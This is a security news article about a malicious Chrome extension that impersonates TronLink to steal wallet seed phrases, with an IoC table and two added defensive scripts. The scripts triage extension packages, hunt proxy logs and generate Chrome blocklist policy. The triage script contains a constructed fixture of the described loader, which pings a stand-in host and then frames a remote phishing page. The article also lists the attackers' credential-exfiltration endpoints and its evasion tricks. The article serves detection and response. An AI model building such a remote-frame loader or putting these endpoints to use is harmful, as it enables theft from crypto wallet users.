Industry News & Leadership · May 12, 2026

Malicious Chrome MV3 Extension Impersonates TronLink to Steal Crypto Wallet Credentials

Cybersecurity News · Archived May 12, 2026




By Tushar Subhra Dutta, May 12, 2026

A fake Chrome browser extension posing as the popular TronLink crypto wallet has been caught stealing wallet credentials from unsuspecting users. The malicious extension operates silently in the background, harvesting mnemonic phrases, private keys, and passwords and forwarding them to the attackers in real time.

This campaign is more dangerous than most because it does not look suspicious at first glance. The fake extension appeared on the Chrome Web Store with a displayed install count of over one million users and a 4.5-star rating backed by hundreds of reviews. Many victims likely installed it without hesitation, believing it to be a legitimate, widely used tool within the TRON ecosystem.

Analysts at SlowMist, a blockchain-focused security firm, identified and documented the threat after their MistEye monitoring system flagged the extension as a high-risk phishing sample. MistEye raised an immediate alert and notified clients once both the fake extension and its connected phishing page were confirmed. SlowMist published its findings to help the broader community identify and protect against this specific attack.

What makes this attack unusual is that the attackers appear to have taken over an already popular and legitimate extension listing on the Chrome Web Store rather than publishing a new one. By inheriting the existing listing's store reputation, they avoided the work of building credibility from scratch: the displayed ratings and install counts belonged to the original listing, so nothing on the surface was forged.

The impact of this campaign can be severe and nearly immediate. Once a user enters wallet credentials into the fake interface, those details are forwarded to attacker-controlled accounts without delay.
Any wallet accessed through this extension should be considered fully compromised, with its digital assets at serious risk of theft.

MV3 Extension Impersonates TronLink

The attack works in two connected layers designed to stay hidden from security tools. The first layer is the Chrome extension itself, which presents as a harmless blockchain explorer and requests only minimal permissions. The second layer is a remote phishing page that loads inside the extension popup and performs all of the actual credential theft. Manifest V3 bars remotely hosted code, but it does not prevent an extension from framing a remote web page inside its popup, and that is the gap this design exploits: the packaged files need to contain little more than a loader.

When a user installs the extension and clicks its icon, the popup quietly checks whether a remote server is reachable, then loads the phishing page inside an embedded frame. The page is a near-perfect copy of the real TronLink web wallet, and most users would not notice the difference.

[Figure: UI impersonation (Source – Medium)]

The extension also uses hidden Unicode characters and Cyrillic lookalike letters so that its name visually resembles "TronLink", helping it slip past automated store review checks.

The phishing page collects every piece of sensitive data a user enters, including mnemonic phrases, private keys, keystore files, and passwords. It then packages that data and sends it directly to the attacker through the Telegram messaging platform, with no visible sign to the victim.

Evasion Tactics and What Users Should Do

The attackers built several protective layers around the phishing page to obstruct security researchers. The page blocks right-clicking, disables text selection, intercepts developer-tools keyboard shortcuts, and redirects suspected bots or analysts to a blank page. It also checks the visitor's locale, automatically redirecting Russian-language users to a separate domain, likely to reduce the risk of drawing local law-enforcement attention.

Users who installed this extension should remove it from Chrome immediately and clear all site data and local storage tied to it.
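As an added example (not SlowMist's or the article's code), here is a small Node.js triage script covering the two package-level tells just described: a display name padded with hidden characters and Cyrillic lookalikes, and a popup whose real UI is fetched from a remote origin. The package it inspects is constructed for illustration; remote.example, the file names and the function names are assumptions, not details taken from the real sample.

```javascript
// Added example (not SlowMist's or the article's code): static triage of an
// unpacked extension for a lookalike name and a popup that loads its real UI
// from a remote origin. All inputs are constructed; the package below is an
// illustration of the described layout, not the real sample.
"use strict";

// Zero-width and bidi control characters that render as nothing in a name.
const HIDDEN_CHARS = /[\u200B-\u200F\u2028-\u202E\u2060-\u2064\uFEFF]/g;

// Cyrillic letters whose glyphs match a Latin letter (common cases only).
const CYRILLIC_TO_LATIN = {
  "\u0430": "a", "\u0435": "e", "\u043E": "o", "\u0440": "p", "\u0441": "c",
  "\u0443": "y", "\u0445": "x", "\u0410": "A", "\u0412": "B", "\u0415": "E",
  "\u041A": "K", "\u041C": "M", "\u041D": "H", "\u041E": "O", "\u0420": "P",
  "\u0421": "C", "\u0422": "T", "\u0425": "X",
};

// Reports hidden characters, mixed Latin/Cyrillic script, and whether the
// name collapses to a trusted brand while not being equal to it.
function analyzeExtensionName(name, expected) {
  const hidden = name.match(HIDDEN_CHARS) || [];
  const visible = name.replace(HIDDEN_CHARS, "");
  const skeleton = Array.from(visible.normalize("NFKC"))
    .map((ch) => CYRILLIC_TO_LATIN[ch] || ch)
    .join("");
  return {
    hiddenCount: hidden.length,
    mixedScript: /\p{Script=Latin}/u.test(visible) && /\p{Script=Cyrillic}/u.test(visible),
    skeleton,
    impersonates: name !== expected && skeleton === expected,
  };
}

// Every http(s) origin that appears as a literal in HTML or JS. MV3 forbids
// remotely hosted code, but a remote *page* in an <iframe> is still allowed,
// so any network origin referenced by popup code deserves a look.
function extractRemoteOrigins(text) {
  const origins = new Set();
  for (const m of text.matchAll(/https?:\/\/[^\s"'<>)]+/gi)) {
    try { origins.add(new URL(m[0]).origin); } catch { /* not a URL */ }
  }
  return [...origins].sort();
}

// Triage an unpacked package of shape { manifest: object, files: { path: text } }.
function triagePackage(pkg) {
  const popup = pkg.manifest.action && pkg.manifest.action.default_popup;
  const allText = Object.values(pkg.files).join("\n");
  return {
    name: analyzeExtensionName(pkg.manifest.name, "TronLink"),
    popup,
    remoteOrigins: extractRemoteOrigins(allText),
    // The described sample built its frame at runtime after a reachability
    // check, so a scan for static <iframe src> tags alone would miss it.
    buildsFrameAtRuntime: /createElement\(\s*["']iframe["']\s*\)/.test(allText),
    staticFrames: [...allText.matchAll(/<iframe\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi)].map((m) => m[1]),
  };
}

// Constructed package: a Cyrillic "o" plus a zero-width space in the name, and
// a popup script that pings a remote API and, if it answers, frames a remote page.
const SAMPLE_PACKAGE = {
  manifest: {
    manifest_version: 3,
    name: "Tr\u043EnLink\u200B",
    action: { default_popup: "index.html" },
  },
  files: {
    "index.html": '<!doctype html><div id="app"></div><script src="assets/popup.js"></script>',
    "assets/popup.js": [
      'fetch("https://remote.example/api/visitor/enrich").then((r) => {',
      "  if (!r.ok) return;",
      '  const f = document.createElement("iframe");',
      '  f.src = "https://remote.example/";',
      '  document.getElementById("app").appendChild(f);',
      "});",
    ].join("\n"),
  },
};

const report = triagePackage(SAMPLE_PACKAGE);
console.log(JSON.stringify(report, null, 2));
```

The name check deliberately compares a normalised "skeleton" rather than the raw string, because the whole point of the lookalike trick is that the raw string is not equal to the brand while the rendered glyphs are. The origin scan is a first pass only: a loader that assembles its URL from pieces at runtime will not show up as a literal, which is why the runtime iframe check is reported alongside it.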
If any wallet credentials were entered into the popup, treat those wallets as fully compromised and move all funds to a new wallet created on a trusted device right away. Changing the wallet password does not help, because the mnemonic phrase itself was captured.

Security teams are advised to block the domain tronfind-api[.]tronfindexplorer[.]com at the DNS, proxy, and endpoint layers, and to search existing DNS, proxy, and endpoint-detection logs for it. Monitoring for requests to the specific API paths used by the phishing backend (listed below) can help detect exposure; a request to the /api/data/words endpoint in particular means credentials were actually submitted from that client. Restricting unapproved browser extensions through group policy or device-management controls is a strong long-term step that meaningfully reduces this type of risk.

Indicators of Compromise (IoCs)

Type | Indicator | Description
Domain | tronfind-api[.]tronfindexplorer[.]com | Primary malicious domain; remote UI loading endpoint and credential theft backend
Domain | trx-scan-explorer[.]org | Secondary malicious domain; redirect target for Russian-region users
URL | https[:]//tronfind-api[.]tronfindexplorer[.]com/ | Remote phishing page root URL
URL | https[:]//tronfind-api[.]tronfindexplorer[.]com/api/data/words | Credential exfiltration endpoint
URL | https[:]//tronfind-api[.]tronfindexplorer[.]com/api/visitor/track | Visitor behavior tracking endpoint
URL | https[:]//tronfind-api[.]tronfindexplorer[.]com/api/visitor/create | Visitor creation endpoint
URL | https[:]//tronfind-api[.]tronfindexplorer[.]com/api/visitor/enrich | Visitor enrichment/blocking check endpoint
URL | https[:]//tronfind-api[.]tronfindexplorer[.]com/api/visitor/sync | Visitor sync/blocking check endpoint
Telegram chat_id | 8334454422 | Attacker-controlled Telegram account receiving stolen credentials
Chrome Extension ID | ekjidonhjmneoompmjbjofpjmhklpjdd | Malicious extension ID on Chrome Web Store
MD5 | ce612d027e631d6633582227eb29002f | Hash of malicious extension file
SHA1 | 94d651b42355f2b0765a7435e5a5927623807225 | Hash of malicious extension file
SHA256 | 6b4a4b64e6f969017cb3a9a71dd3038ddf32b989e5342dbbe36650d5802f2ee4 | Malicious file: index.html
SHA256 | b84b89f0a1b7f00431274ac676104acaaa73d440e5731161d1077e733014cc29 | Malicious file: 27-a530a8c5aa9059e0.js
SHA256 | 0cbf4f21cf157227d2c3fba80b64e1f4c3f9d2cc0bf926e024252c35e93edd5a | Malicious JavaScript file (filename not specified)
Filename | index.html | Malicious extension popup entry file
Filename | assets/index.html-2KXeQB-c.js | Core malicious JavaScript logic file within extension package
Filename | 27-a530a8c5aa9059e0.js | Malicious JavaScript file associated with phishing page

Note: domains and URLs are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat-intelligence platforms such as MISP, VirusTotal, or your SIEM.
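The hunting and blocking advice above, as an added example that is not from the article or SlowMist: a Node.js script that re-fangs the published indicators, matches constructed proxy log lines against the malicious hosts and API paths, and emits the Chrome enterprise policy that removes the listing or moves a fleet to allowlist-only mode. ExtensionInstallBlocklist, ExtensionInstallAllowlist and URLBlocklist are the real Chrome policy names; the log format, client addresses and approved extension IDs are assumptions.

```javascript
// Added example (not SlowMist's or the article's code): hunt for the
// published indicators in proxy logs and generate the Chrome policy that
// removes the extension. Log lines and client addresses are constructed.
"use strict";

// Indicators exactly as the article lists them, still defanged so this file
// never carries a live link. refang() restores them for matching.
const IOC = {
  domains: ["tronfind-api[.]tronfindexplorer[.]com", "trx-scan-explorer[.]org"],
  paths: {
    "/api/data/words": "credential exfiltration",
    "/api/visitor/create": "visitor creation",
    "/api/visitor/track": "visitor behaviour tracking",
    "/api/visitor/enrich": "visitor enrichment / blocking check",
    "/api/visitor/sync": "visitor sync / blocking check",
  },
  extensionId: "ekjidonhjmneoompmjbjofpjmhklpjdd",
};

// Undo the "[.]" and "[:]" defanging used in the IoC table.
function refang(s) {
  return s.replace(/\[\.\]/g, ".").replace(/\[:\]/g, ":");
}

const BAD_HOSTS = IOC.domains.map(refang);

function isBadHost(host) {
  return BAD_HOSTS.some((d) => host === d || host.endsWith("." + d));
}

// Assumed log shape, one request per line: "<ts> <client> <method> <url> <status>".
// Returns one hit per request to a malicious host. A hit on the exfiltration
// path means credentials were actually submitted from that client.
function scanProxyLog(lines) {
  const hits = [];
  for (const line of lines) {
    const [ts, client, method, url] = line.trim().split(/\s+/);
    if (!url) continue;
    let u;
    try { u = new URL(url); } catch { continue; } // skip unparsable lines
    if (!isBadHost(u.hostname)) continue;
    hits.push({
      ts, client, method,
      host: u.hostname,
      path: u.pathname,
      reason: IOC.paths[u.pathname] || "contact with malicious domain",
      severity: u.pathname === "/api/data/words" ? "critical" : "high",
    });
  }
  return hits;
}

// Chrome enterprise policy that removes the known listing and blocks the
// backend. URLBlocklist host entries match the host and all of its subdomains.
function blockKnownBadPolicy() {
  return {
    ExtensionInstallBlocklist: [IOC.extensionId],
    URLBlocklist: BAD_HOSTS.slice(),
  };
}

// Allowlist-only mode, the long-term control the article recommends: block
// every extension, then re-enable only the IDs your organisation has vetted.
function allowlistOnlyPolicy(approvedIds) {
  return {
    ExtensionInstallBlocklist: ["*"],
    ExtensionInstallAllowlist: approvedIds.slice(),
  };
}

// Constructed sample log, written defanged for the same reason as IOC and
// re-fanged before use; real proxy logs are of course not defanged.
const SAMPLE_LOG = [
  "2026-05-12T10:04:31Z 10.0.0.15 GET https[:]//tronfind-api[.]tronfindexplorer[.]com/api/visitor/enrich 200",
  "2026-05-12T10:04:33Z 10.0.0.15 GET https[:]//tronfind-api[.]tronfindexplorer[.]com/ 200",
  "2026-05-12T10:05:02Z 10.0.0.15 POST https[:]//tronfind-api[.]tronfindexplorer[.]com/api/data/words 200",
  "2026-05-12T10:05:10Z 10.0.0.22 GET https://www.example.org/ 200",
  "2026-05-12T10:06:45Z 10.0.0.31 GET https[:]//trx-scan-explorer[.]org/ 302",
].map(refang);

console.log(scanProxyLog(SAMPLE_LOG));
console.log(JSON.stringify(blockKnownBadPolicy()));
console.log(JSON.stringify(allowlistOnlyPolicy(["<approved-extension-id>"])));
```

Adapt the line parser to your proxy's actual format; the rest is independent of it. The severity split matters for triage: a client that only reached the enrich or sync endpoints opened the popup, while a client that posted to /api/data/words handed over a seed phrase and needs the wallet-migration response described above.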